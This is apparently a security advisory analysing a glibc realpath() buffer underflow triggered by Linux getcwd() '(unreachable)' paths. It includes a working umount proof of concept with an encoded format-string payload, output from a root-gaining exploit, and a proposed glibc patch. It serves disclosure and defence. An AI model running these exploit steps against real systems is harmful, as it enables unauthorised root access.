The vulnerability described here is caused by Linux kernel behaviour change in the syscall API (returning relative pathnames in getcwd()) and non-defensive function implementation in libc (failing to process that pathname correctly). Other libraries are very likely to be affected as well. On affected systems this vulnerability can be used to gain root privileges via SUID binaries.

The return value specification change in getcwd() was introduced in Linux kernel Linux 2.6.36. It has already caused troubles, even in realpath(), but at different location (see bug report) and was not identified as security issue.

Linux kernel side:

One of the weaknesses of Linux kernel is, that it is not fully POSIX compliant (see Wikipedia POSIX). To allow programmers to produce clean and secure code, meticulous documentation would be needed, especially to write cross-platform software. Changes in specification and documentation after software was already written always pose an extra risk. This is also true for commit vfs: show unreachable paths in getcwd and proc changing the behaviour of getcwd(). The new specification made it finally to the manpages (see getcwd(2)), but at that time glibc was already written. From the somehow contradictory man page:

These functions return a null-terminated string containing an _absolute_ pathname that is the current working directory of the calling process. The pathname is returned as the function result and via the argument buf, if present.

If the current directory is not below the root directory of the current process (e.g., because the process set a new filesystem root using chroot(2) without changing its current directory into the new root), then, since Linux 2.6.36, the returned path will be prefixed with the string "(unreachable)". Such behavior can also be caused by an unprivileged user by changing the current directory into another mount namespace. When dealing with paths from untrusted sources, callers of these functions should consider checking whether the returned path starts with '/' or '(' to avoid misinterpreting an unreachable path as a relative path....

...getcwd() conforms to POSIX.1-2001. Note however that POSIX.1-2001 leaves the behavior of getcwd() unspecified if buf is NULL.

The documentation is accurate regarding use of (unreachable) but most likely not according POSIX compliance. At least POSIX 2004 and 2008 are violated, 2001 version of standard seems not available for free. According to IEEE Std 1003.1-2008 specification of getcwd():

The getcwd() function shall place an absolute pathname of the current working directory in the array pointed to by buf, and return buf. The pathname shall contain no components that are dot or dot-dot, or are symbolic links.

As it seems, that consequences from the change of interface specification on Linux kernel side only were not recognized by all affected parties. The realpath() function, which relies on using getcwd() to resolve relative path names still required the old behaviour. Also the manpage does not reflect the changes in underlying getcwd() call, see realpath(3).

Libc side:

glibc still assumes that kernel getcwd() would return absolute pathnames and relies on that behaviour when realpath() attempts to create a canonicalized absolute pathname:

realpath() expands all symbolic links and resolves references to /./, /../ and extra '/' characters in the null-terminated string named by path to produce a canonicalized absolute pathname...

When resolving a relative symbolic link, e.g. ../../x, realpath() will use the current working directory, assuming it will start with a /. The function starts at the end of the getcwd pathname to jump forward from slash to slash for each ../ found in the symbolic link to resolve. It does not check the boundaries of the buffer, thus may end up at a slash before the string buffer used to create the canonicalized absolute pathname. So resolving the link named above with getcwd() returning (unreachable)/, the second ../ will have moved the pointer before the buffer, the next part x is then copied to this memory location. As realpath usually operates on heap buffers.


This section describes how to improve a simple demonstrator to a complex, ASLR-aware high-reliable exploit. The steps used might not be the most elegant way to do so. Any hints for improvement are appreciated.

To exploit the underflow for privilege escalation, the mount, unmount SUID binaries are most suitable targets: they process pathes using realpath(), do not drop privileges and can be invoked by any user. umount was selected as candidate as it allows to process more than one mountpoint per run, thus traversing the problematic code more than once. This seemed to be the best way to allow user controlled gradual memory editing, defeat of ASLR measures and finally quite reliable code execution.

As umount realpath() operates on heap, the first step was to create a reproducible heap layout. This was done be removing all interfering environment variables and just working with those related to locale support. As locales are initialized before umount option parsing, this editing affectes the heap structure and content lower addresses than the buffer used in the fatal realpath() call. Therefore the current exploit relies on the availability of a single locale, but libc-bin on standard systems provides one: /usr/lib/locale/C.UTF-8. It is loaded by using the environment variable LC_ALL=C.UTF-8.

After locale setup, the realpath buffer underflow will overwrite a slash in a locale string, used for loading of national language support (NLS) files, thus changing it to a relative pathname. Thus user controlled translations of umount error messages are loaded, giving write access to some memory adresses using the %n format feature of fprintf to modify memory. As the stack layout used by fprintf is fixed, any address references will work without considering ASLR. Luckily, one of those references points to the struct libmnt_context defined in libmount/src/mountP.h from util-linux:

struct libmnt_context { int action; /* MNT_ACT_{MOUNT,UMOUNT} */ int restricted; /* root or not? */ char *fstype_pattern; /* for mnt_match_fstype() */ char *optstr_pattern; /* for mnt_match_options() */ ...

As the restricted field is within reach, overwriting it will make umount believe, that it was started by root, even when it was not. This can be used for a quite simple DoS by unmounting the root filesystem, which will cause very funny side effects on running programs, e.g. aborts, SEGV, .... Follwing commands demonstrate the behaviour on fully patched Debian Stretch amd64 with libc6 2.24-11+deb9u1 and umount from package mount 2.29.2-1. Keep in mind, that this simplified POC operates on the umount process memory, thus will need adoption to other software versions:

# Enable USERNS clone as root for demonstration: root$ echo 1 > /proc/sys/kernel/unprivileged_userns_clone # As normal user create a new namespace: test$ /usr/bin/unshare -m -U --map-root-user /bin/sh # Caveat: following steps are performed as USERNS-root, not real # root user. root$ mount -t tmpfs tmpfs /tmp root$ cd /tmp root$ chmod 00755 . root$ mkdir -p -- "(unreachable)/tmp" "(unreachable)/tmp/from_archive/C/LC_MESSAGES" "(unreachable)/x" root$ ln -s ../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A "(unreachable)/tmp/down" # Make mount unrestricted by overwriting struct libmnt_context, thus # affecting mnt_context_is_restricted in "libmount/src/context.c". root$ base64 -d <<B64-EOF | bzip2 -cd > "(unreachable)/tmp/from_archive/C/LC_MESSAGES/" QlpoOTFBWSZTWTOfm9IAAGX/pn6UlARGB+FeKyZnAD/n3mACAAAgAAEgAJSIqfkpspk0eUGJ6gAG mQeoaD1PJAamlPJGCNMTIaNGmnqMQ0AAzSwpEWpQICVUw+490ohZBgZ+s4EBAZCn/TavSQshtCiv iG6HOehyAp4FPt3zkpdTxNchTYITLBkXUjsgpN2QDBNX8qmbpkVgfLXKcQc1ZhVF0FxUQOtnbGlL 5NhRmORwmQF1Dw3Yu1mds6tGAmnLwWwc2KRKGl5hcLuSKcKEgZz83pA= B64-EOF root$ echo "$$" 2299 # Now continue in another shell using the USERNS pid from before: test$ cd /proc/2299/cwd test$ LC_ALL=C.UTF-8 /bin/umount --lazy down / umount: AAlnAAAAAAAAAAA

The simplified single-stage POC from above has multiple drawbacks: it can only reliable toggle the permissions bit, thus allowing unmounting / causing DoS, but not arbitrary code execution. For that, ASLR has to be defeated first. This can be done by following sequence of events:

All those steps are currently implemented in RationalLove.c working on Debian Stretch, Ubuntu Xenial and Linux Mint. Lao Wei also managed to find suitable parameters for SuSE 12 SP2 and adapted the exploit to provide RationalLove-SuSE12-SP2.c:

test@test$ ./RationalLove ./RationalLove: setting up environment ... ./RationalLove: using umount at "/bin/umount". Attempting to gain root, try 1 of 10 ... Starting subprocess Stack content received, calculating next phase Found source address location 0x7fffb6505d18 pointing to target address 0x7fffb6505de8 with value 0x7fffb650723f, libc offset is 0x7fffb6505d08 Changing return address from 0x7f9617db62b1 to 0x7f9617e41c30, 0x7f9617e4e900 Using escalation string %67$hn%71$hn%1$6116.6116s%65$hn%69$hn%1$1100.1100s%64$hn%1$25446.25446s%66$hn%70$hn%1$26986.26986s%68$hn%1$5888.5888s%1$23798.23798s%1$s%1$s%63$hn%1$s%1$s%1$s%1$s%1$s%1$s%1$186.186s%37$hn-%35$lx-%37$lx-%62$lx-%63$lx-%64$lx-%65$lx-%66$lx-%67$lx-%68$lx-%69$lx-%78$s Executable now root-owned Cleanup completed, re-invoking binary /proc/self/exe: invoked as SUID, invoking shell ... root@test# id uid=0(root) gid=0(root) groups=0(root),100(users)

ASLR could also be circumvented using a but in mount environment variable handling, see util-linux mount/unmount ASLR bypass via environment variable.

Results, Discussion

As for example, misbehaviour can be triggered when performing a getcwd call in a directory not visible in the current mount namespace of the process. See mount_namespaces man page for more information. Therefore a process has to reach such a directory within another namespace. There should be various ways to do that, e.g. using the proc filesystem to enter the working directory of another process (method used in exploit), by passing file descriptors via SCM_RIGHTS between cooperating processes in different namespaces. Therefore this vulnerability shows again the importance of system hardening by disabling USERNS when not needed.

On a system with unprivileged USERNS enabled, an attacker can create all required namespaces. On other systems, it might be possible to use namespaces created by other processes using the proc access approach. These can be discovered using readlink /proc/*/ns/mnt | sort -u. While systemd-udevd just uses a namespace in a way required for exploitation, the /proc/[pid]/cwd link cannot accessed by unprivileged users. Still systemd-udevd is a good example, how hardening of a single application by namespaces might also create additional attack surface, not only in the application itself. Hence the attack method described here may also be appropriate to attack other applications using the same hardening measures, e.g. lxc or docker.

Affected systems:

Systems with Linux Kernel prepending getcwd() path with non-path components, e.g. to indicate unreachable pathes. Such code can be found in fs/dcache.c:

static int prepend_unreachable(char **buffer, int *buflen) { return prepend(buffer, buflen, "(unreachable)", 13); }

Most likely this code was created in analogy to the (deleted) suffix to indicate file handles to deleted files, e.g.:

test$ touch /tmp/x test$ exec 3</tmp/x test$ rm /tmp/x test$ readlink /proc/self/fd/3 /tmp/x (deleted)

Userspace: Currently only libc is proven to misbehave when Linux getcwd() returns a relative path. But other libraries or tools might also fail in unexpected ways due to that bug.

glibc: Here the underflow occurs in __realpath from stdlib/canonicalize.c:

42 char * 43 __realpath (const char *name, char *resolved) 44 { ... # When resolving a relative pathname, getcwd() is called: 86 if (name[0] != '/') 87 { 88 if (!__getcwd (rpath, path_max)) 89 { 90 rpath[0] = '\0'; 91 goto error; 92 } 93 dest = __rawmemchr (rpath, '\0'); 94 } 95 else ... # Loop over all name components: 101 for (start = end = name; *start; start = end) 102 { ... # If the name component is "..", remove it. This underflows the # buffer if rpath does not contain a starting slash. 118 else if (end - start == 2 && start[0] == '.' && start[1] == '.') 119 { 120 /* Back up to previous component, ignore if at root already. */ 121 if (dest > rpath + 1) 122 while ((--dest)[-1] != '/'); 123 } 124 else # The name component is not ".", "..", so copy the name to dest. 125 { 126 size_t new_size; 127 128 if (dest[-1] != '/') 129 *dest++ = '/'; ...

Therefore a simple patch could be glibc-fail-on-unreachable-v1.patch (nearly UNTESTED, older version v0):

--- stdlib/canonicalize.c 2018-01-05 07:28:38.000000000 +0000 +++ stdlib/canonicalize.c 2018-01-05 14:06:22.000000000 +0000 @@ -91,6 +91,11 @@ goto error; } dest = __rawmemchr (rpath, '\0'); +/* If path is empty, kernel failed in some ugly way. Realpath +has no error code for that, so die here. Otherwise search later +on would cause an underrun when getcwd() returns an empty string. +Thanks Willy Tarreau for pointing that out. */ + assert (dest != rpath); } else { @@ -118,8 +123,17 @@ else if (end - start == 2 && start[0] == '.' && start[1] == '.') { /* Back up to previous component, ignore if at root already. */ - if (dest > rpath + 1) - while ((--dest)[-1] != '/'); + dest--; + while ((dest != rpath) && (*--dest != '/')); + if ((dest == rpath) && (*dest != '/') { + /* Return EACCES to stay compliant to current documentation: + "Read or search permission was denied for a component of the + path prefix." Unreachable root directories should not be + accessed, see */ + __set_errno (EACCES); + goto error; + } + dest++; } else {


It might be worth analyzing how ftp server implementation, webservers will react in such context. In some cases, this may require combination with application specific bugs or unexpected behaviour, e.g. ApacheNoFollowSymlinkTimerace.


Material, References

Last modified 20190101
Contact e-mail: me (%)